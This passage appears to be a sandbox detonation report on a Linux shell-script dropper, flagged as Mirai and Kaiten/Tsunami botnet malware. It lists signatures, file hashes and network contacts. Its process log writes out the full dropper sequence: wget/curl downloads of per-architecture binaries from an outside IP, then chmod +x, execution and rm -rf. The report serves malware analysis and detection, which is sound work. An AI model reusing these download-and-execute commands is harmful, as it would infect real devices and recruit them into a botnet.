SHA1 1fa81b589ee9e8764216b386e4fd5d1d3738bc39
SHA256 9d5a6901e239005e00d80dbc77c7a5c764ea6ca89d4d56ed973676acfb6a5298
SHA512 68b4279897b60f8019bb33d12e50cf55dae3bc337cc5033aefcfe9275b7f33e31a88a773875d10b5a69243178f936f0ba278410870f7e04bd72eaf360cf1fda1

/tmp/GoldAge3ATOx86

MD5 b6fe48263b89bb87446e76bb55170f26
SHA1 d88d976b1701dafe670a07313f14d3f217855850
SHA256 68373bd10e71b2cc7e292480ef48a8ca039ecabf25919fcbef3c70b88cd9231c
SHA512 7e920ebe6209cb785ced9772b4ce046f32bae16b1a3f73ffe821aa0c5978a0ca0e86a9b609c7b1305ef52e2329fb394282a9da5b0ae6fbbb7ec367036281681b

/tmp/bash

MD5 89ce675ecc4ca2e46f1c412a7074aaf9
SHA1 cbd5de6624cfd3d76e4cb72eb49938c6b12b2f1d
SHA256 c2cdab77264c2bda90a1e150dad77a827183d358f51fbf2325282293809e6ad8
SHA512 a962bc08019f778d59d30ceab2d2c13e9e70d08b559b174ac0b63e0de98c248d1ca16ee1b2ae76e3bade67d493d12d8fabd7385fcc8427ad962d8f3785571a31

Analysis: behavioral2

Detonation Overview

Submitted

2025-05-20 17:08

Reported

2025-05-20 17:10

Platform

debian9-armhf-20250410-en

Max time kernel

149s

Max time network

151s

Command Line

[/tmp/x.sh]

Signatures

Detects Kaiten/Tsunami Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects Kaiten/Tsunami payload

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Kaiten/Tsunami

botnet kaiten

Mirai

botnet mirai

Mirai family

mirai

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GoldAge3ATOarm /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm5 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm6 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOarm7 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOm68k /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmips /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOmpsl /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOppc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOsh4 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOspc /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx64 /tmp/x.sh N/A
N/A /tmp/GoldAge3ATOx86 /tmp/x.sh N/A
N/A /tmp/bash /tmp/x.sh N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/GoldAge3ATOarm N/A
File opened for modification /dev/misc/watchdog /tmp/GoldAge3ATOarm N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 84.162.70.65 N/A N/A

Enumerates active TCP sockets

discovery
Description Indicator Process Target
File opened for reading /proc/net/tcp /tmp/GoldAge3ATOarm N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself bhabssbbahhbahhhasa /tmp/GoldAge3ATOarm N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads system network configuration

discovery
Description Indicator Process Target
File opened for reading /proc/net/tcp /tmp/GoldAge3ATOarm N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/647/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/279/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/594/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/642/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/649/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/650/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/1/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/311/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/227/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/309/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/593/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/291/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/683/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/681/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/655/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/686/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/321/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/587/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/594/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/316/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/593/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/685/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/685/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/574/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/143/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/293/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/648/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/574/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/834/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/681/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/278/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/771/exe /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/168/fd /tmp/GoldAge3ATOarm N/A
File opened for reading /proc/294/fd /tmp/GoldAge3ATOarm N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/GoldAge3ATOmips N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/curl N/A
File opened for modification /tmp/bash /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOspc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/wget N/A
File opened for modification /tmp/bash /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOsh4 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx64 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm5 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOm68k /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOmpsl /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOppc /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOx86 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm6 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/wget N/A
File opened for modification /tmp/GoldAge3ATOarm7 /usr/bin/curl N/A
File opened for modification /tmp/GoldAge3ATOmips /usr/bin/wget N/A

Processes

/tmp/x.sh

[/tmp/x.sh]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm -O /tmp/GoldAge3ATOarm]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm -o /tmp/GoldAge3ATOarm]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm]

/tmp/GoldAge3ATOarm

[/tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm5 -O /tmp/GoldAge3ATOarm5]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm5 -o /tmp/GoldAge3ATOarm5]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm5]

/tmp/GoldAge3ATOarm5

[/tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm5.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm6 -O /tmp/GoldAge3ATOarm6]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm6 -o /tmp/GoldAge3ATOarm6]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm6]

/tmp/GoldAge3ATOarm6

[/tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm6.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOarm7 -O /tmp/GoldAge3ATOarm7]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOarm7 -o /tmp/GoldAge3ATOarm7]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOarm7]

/tmp/GoldAge3ATOarm7

[/tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7]

/bin/rm

[rm -rf /tmp/GoldAge3ATOarm7.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOm68k -O /tmp/GoldAge3ATOm68k]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOm68k -o /tmp/GoldAge3ATOm68k]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOm68k]

/tmp/GoldAge3ATOm68k

[/tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k]

/bin/rm

[rm -rf /tmp/GoldAge3ATOm68k.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmips -O /tmp/GoldAge3ATOmips]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmips -o /tmp/GoldAge3ATOmips]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmips]

/tmp/GoldAge3ATOmips

[/tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmips.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOmpsl -O /tmp/GoldAge3ATOmpsl]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOmpsl -o /tmp/GoldAge3ATOmpsl]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOmpsl]

/tmp/GoldAge3ATOmpsl

[/tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl]

/bin/rm

[rm -rf /tmp/GoldAge3ATOmpsl.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOppc -O /tmp/GoldAge3ATOppc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOppc -o /tmp/GoldAge3ATOppc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOppc]

/tmp/GoldAge3ATOppc

[/tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOppc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOsh4 -O /tmp/GoldAge3ATOsh4]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOsh4 -o /tmp/GoldAge3ATOsh4]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOsh4]

/tmp/GoldAge3ATOsh4

[/tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4]

/bin/rm

[rm -rf /tmp/GoldAge3ATOsh4.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOspc -O /tmp/GoldAge3ATOspc]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOspc -o /tmp/GoldAge3ATOspc]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOspc]

/tmp/GoldAge3ATOspc

[/tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc]

/bin/rm

[rm -rf /tmp/GoldAge3ATOspc.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx64 -O /tmp/GoldAge3ATOx64]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx64 -o /tmp/GoldAge3ATOx64]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx64]

/tmp/GoldAge3ATOx64

[/tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx64.1]

/usr/bin/wget

[wget http://185.236.24.192/GoldAge3ATOx86 -O /tmp/GoldAge3ATOx86]

/usr/bin/curl

[curl http://185.236.24.192/GoldAge3ATOx86 -o /tmp/GoldAge3ATOx86]

/bin/chmod

[chmod +x /tmp/GoldAge3ATOx86]

/tmp/GoldAge3ATOx86

[/tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86]

/bin/rm

[rm -rf /tmp/GoldAge3ATOx86.1]

/usr/bin/wget

[wget http://185.236.24.192/bash -O /tmp/bash]

/usr/bin/curl

[curl http://185.236.24.192/bash -o /tmp/bash]

/bin/chmod

[chmod +x /tmp/bash]

/tmp/bash

[/tmp/bash]

/bin/rm

[rm -rf /tmp/bash]

/bin/rm

[rm -rf /tmp/bash.1]

Network

Country Destination Domain Proto
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:27501 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
FI 185.236.24.192:80 185.236.24.192 tcp
DE 84.162.70.65:53 udp

Files

/tmp/GoldAge3ATOarm

MD5 c37a156e474db5c40f0affd035ee358f
SHA1 990bc43195246650ee6929c2c40afe7efa14d058
SHA256 18a3befd33ac144b1ae8ece9be2fa9517df8ea4ef62b0d210cce7b6b7e263876
SHA512 ebaf7a2ab1644ac755384051f172408586a16bbbbe1c5e1b99c2981d90ced4e9689467e57b2a042fd0b92a7ba7de6022e92f765a8f3cbf55623d97ff48dc34d6

/tmp/GoldAge3ATOarm5

MD5 d8e7f95f2de61c8a75cf9cf7777ba06d
SHA1 040e5656fed375ef1c7e253822f0edb3f350616b
SHA256 392ca33932bec6f83bd53b51970eecf5ef8ff6ca0f47ffa640beff921c20a2db
SHA512 6e1c39b175b90612d16b18c687af41045072578f0e80246c849809c3fb83a584184d47fd8d55654c563e38c46108e1ef84012f61d3c82a2d733ac3e644a34dc8

/tmp/GoldAge3ATOarm6

MD5 3c5c66502403c26ffd38c305e0073e56
SHA1 584b0a7b269f9e07d3d1ca9880b8710f035e435a
SHA256 f2a18d1a418690bfe26ff26db63fa327bd1c142a1fc3508960dfa75a194ac900
SHA512 48732ec0cb0abb84b63539bfc5fe4f0b2e3a4c40b384bec72b3c66d960b65844c5b6e5bc2d56b547542e5662e5f56bef6640f5f2b14c945e21ad0bd15ef09e89

/tmp/GoldAge3ATOarm7

MD5 d1bc7e87209a400dfa40307eca08289a
SHA1 b9922e7972f0c46ecbcc18503b37b46299d3eaf9
SHA256 7bc58e1c54dd5971bab649122ec1b0816ed621fc5a2d437d6994fe7eda4a395b
SHA512 258792c9507a36217af3cbc76d77c1f21f8d0c3dffc18e492779faf44d8c7d6f9dca1f01dfe8255f4e727e414065c8f1aa5f4b9f73405d0023fadb0600f5da50

/tmp/GoldAge3ATOm68k

MD5 b9e708d1101756b3452ff33eaaa984f9
SHA1 f7744930aa85da6dbf7785c91e01e419987ce4e5
SHA256 7c6f4467faa1c72f79a1c531fcb1619fa65aec4ce7c8cb2936552f1b06ed9cc1
SHA512 1372ee01debf96dc8dce942a3d5ade2217d86ced03f4d666687a792c1fbff28000a4041734b11037e1559138d57a92c4a33074b65e7bf719d1828d4ef2bb78fa

/tmp/GoldAge3ATOmips

MD5 db3d52d93de2b229748c916d261ca0d5
SHA1 29889196802fe35c0e5933991bd7f4a89de56946
SHA256 75c9cf0d001e46db32ff206a3595bddf61851db6c4a803e2233f2b348c969de5
SHA512 405b1b673e23f4fabe7f124101d0aa66e9d71b561260d5164bc29d76e74ae9dab58f7330b1860ccf27fde664d087408cd73f1c9429c2bf0af815c8f0f0ee6652

/tmp/GoldAge3ATOmpsl

MD5 2439dbad4a1cb56d7ea54b35aa36251e
SHA1 b9d2099aaab3868094bb20bf556b3b20e8ea5203
SHA256 050c88a81f61024402a9353deb359ca014d1cae2c699998223f5855d8fcaf552
SHA512 32ca9cee3d237c4920cf1ef3f4e0e2bd0b11698317f9030caf909ab8b74198cb3f4b5d18051c7ee168fec32fc925c059c1ab714fe530e13b600a787fcc67dc25

/tmp/GoldAge3ATOppc

MD5 92038a8e6f1123573cf5cd61d21f61ed
SHA1 cf01a5b89a91b6af3c7da41a3ade8e7a8e0d1083
SHA256 a93f71d045ede0d3d2ae06183f1f6f2d37a47122aed4fafeaafecb4a05f6afe8
SHA512 00f1a4365a51fa1a06a7e2d1222554049e35caf894898daf1e44f6a3e9962c50c4aa01840f91e21a443d6640c348decd8178070921acf9f13f91b5ff73915567

memory/793-1-0xb675b000-0xb676c044-memory.dmp

/tmp/GoldAge3ATOsh4

MD5 5eba0470ee235a99e4b34517333a1cd1
SHA1 0e417be4cc0769c9480f245941c2f0463147d1fd
SHA256 ffd3b51636907bb20012b0e954a100e3c57e97ae1b2ba7d3af521cf09f5ea5bb
SHA512 5dc3454c6fa7a7b53d7f8d7230f62866f6ae2bca9f3c74263e622676457f61ea623fb711a8d1ea84fda52dc6be1375af62359d6672b3335ccbd4633e1ca2b468

/tmp/GoldAge3ATOspc

MD5 dfcc2c1625e3a1788667a70ca731dedb
SHA1 bdc644788b8599579d8ce88e47270dc67839b226
SHA256 37999177b9eeb0ffbf4b074065e61ad01f22182a9ac102ddbcfc754d966b65b3
SHA512 1c13023098df56eeafde489642a65918250cb92889d564a94178645c544a7fb2cb478aa6e3a9b349ac872ba6cfd4c98b2c31dcafecadbfb1061352984c214d57

/tmp/GoldAge3ATOx64

MD5 399037675ef247197dec6471d9bfbf57
SHA1 1fa81b589ee9e8764216b386e4fd5d1d3738bc39
SHA256 9d5a6901e239005e00d80dbc77c7a5c764ea6ca89d4d56ed973676acfb6a5298
SHA512 68b4279897b60f8019bb33d12e50cf55dae3bc337cc5033aefcfe9275b7f33e31a88a773875d10b5a69243178f936f0ba278410870f7e04bd72eaf360cf1fda1

/tmp/GoldAge3ATOx86

MD5 b6fe48263b89bb87446e76bb55170f26
SHA1 d88d976b1701dafe670a07313f14d3f217855850
SHA256 68373bd10e71b2cc7e292480ef48a8ca039ecabf25919fcbef3c70b88cd9231c
SHA512 7e920ebe6209cb785ced9772b4ce046f32bae16b1a3f73ffe821aa0c5978a0ca0e86a9b609c7b1305ef52e2329fb394282a9da5b0ae6fbbb7ec367036281681b

/tmp/bash

MD5 89ce675ecc4ca2e46f1c412a7074aaf9
SHA1 cbd5de6624cfd3d76e4cb72eb49938c6b12b2f1d
SHA256 c2cdab77264c2bda90a1e150dad77a827183d358f51fbf2325282293809e6ad8
SHA512 a962bc08019f778d59d30ceab2d2c13e9e70d08b559b174ac0b63e0de98c248d1ca16ee1b2ae76e3bade67d493d12d8fabd7385fcc8427ad962d8f3785571a31